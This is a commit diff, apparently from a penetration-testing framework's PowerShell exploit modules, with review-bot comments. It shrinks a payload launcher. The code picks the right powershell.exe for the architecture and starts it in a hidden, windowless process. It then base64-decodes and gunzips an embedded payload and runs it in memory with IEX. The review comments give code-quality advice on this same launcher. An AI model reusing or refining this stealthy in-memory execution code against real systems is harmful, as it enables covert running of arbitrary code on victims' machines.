Reduce payload size
parent
b10df54dbb
commit
c76862b391
|
@ -183,33 +183,25 @@ module Exploit::Powershell
|
|||
end
|
||||
|
||||
process_start_info = <<EOS
|
||||
$si=New-Object System.Diagnostics.ProcessStartInfo
|
||||
$si.FileName=$ps_bin
|
||||
$si.Arguments='#{ps_args}'
|
||||
$si.UseShellExecute=$false
|
||||
$si.RedirectStandardOutput=$true
|
||||
$si.WindowStyle='Hidden'
|
||||
$si.CreateNoWindow=$true
|
||||
$p=[System.Diagnostics.Process]::Start($si)
|
||||
$s=New-Object System.Diagnostics.ProcessStartInfo
|
||||
$s.FileName=$b
|
||||
$s.Arguments='#{ps_args}'
|
||||
$s.UseShellExecute=$false
|
||||
$s.RedirectStandardOutput=$true
|
||||
$s.WindowStyle='Hidden'
|
||||
$s.CreateNoWindow=$true
|
||||
$p=[System.Diagnostics.Process]::Start($s)
|
||||
EOS
|
||||
process_start_info.gsub!("\n",';')
|
||||
|
||||
|
||||
archictecure_detection = <<EOS
|
||||
$x86=#{arch_x86};
|
||||
if ([IntPtr]::Size -eq 4) {
|
||||
if ($x86) {
|
||||
$ps_bin='powershell.exe'
|
||||
} else {
|
||||
$ps_bin=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
}
|
||||
} else {
|
||||
if ($x86) {
|
||||
$ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
} else {
|
||||
$ps_bin='powershell.exe'
|
||||
}
|
||||
};
|
||||
$a=#{arch_x86};
|
||||
if([IntPtr]::Size -eq 4){
|
||||
if($a){$b='powershell.exe'}
|
||||
else{$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}
|
||||
}else{
|
||||
if($a){$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
}else{$b='powershell.exe'}};
|
||||
EOS
|
||||
archictecure_detection.gsub!("\n","")
|
||||
archictecure_detection.gsub!("\s\s","")
|
||||
|
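Review bot: `archictecure_detection.gsub!("\s\s","")` does not do what its spelling suggests: in a Ruby double-quoted string `\s` is a literal space, so the call only deletes pairs of adjacent spaces rather than whitespace runs, and it would also mangle any double space that later ends up inside one of the quoted PowerShell literals. If the intent is to strip the heredoc's leading indentation, say so explicitly with `archictecure_detection.gsub!(/^\s+/, '')`; if the new hand-minified lines are meant to carry no indentation at all, the call is now dead and can go. The preceding `gsub!("\n","")` joins the lines with nothing in between, so the script only stays valid because every line ends in `{`, `}` or `;` — a short comment stating that invariant above the heredoc would stop a future edit from breaking it. The enclosing method starts before this hunk.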
@ -269,7 +261,7 @@ EOS
|
|||
command = "%COMSPEC% /b /c #{psh_command}"
|
||||
end
|
||||
|
||||
vprint_status("Command length: #{command.length}")
|
||||
vprint_status("Powershell command length: #{command.length}")
|
||||
return command
|
||||
end
|
||||
|
||||
|
|
|
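Review bot: The relabelled message `vprint_status("Powershell command length: #{command.length}")` reports the length of `command`, which on the visible branch is the `%COMSPEC% /b /c #{psh_command}` wrapper and not just the PowerShell command, so the new label may mislead when the number is compared against a command-line length limit; if that is the figure of interest, print `psh_command.length` as well or name the value "Full command length". The enclosing method begins outside this hunk, so whether other branches assign a bare PowerShell string to `command` cannot be confirmed here.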
@ -54,14 +54,11 @@ module Powershell
|
|||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$s=New-Object IO.MemoryStream(,"
|
||||
psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression << "$(IEX $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "$s,"
|
||||
psh_expression = "IEX(New-Object IO.StreamReader("
|
||||
psh_expression << "(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{encoded_stream}'))),"
|
||||
psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd();"
|
||||
|
||||
# If eof is set, add a marker to signify end of code output
|
||||
#if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
|
||||
|
|
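Review bot: The two context comments `# Decode base64 encoded command and create a stream object` and `# Uncompress and invoke the expression (execute)` now sit stacked directly above the single `psh_expression = "IEX(New-Object IO.StreamReader("` assignment, so neither describes a distinct step any more and the first is attached to the line that performs the invoke. Collapse them into one comment such as `# Base64-decode, gunzip and read the payload as ASCII, then IEX the resulting text in one expression`. The leading `IEX(`/`.ReadToEnd()` form relies on PowerShell treating a parenthesised argument followed by a member access as one expression in argument mode; a short note to that effect would save the next reader from "fixing" the missing space.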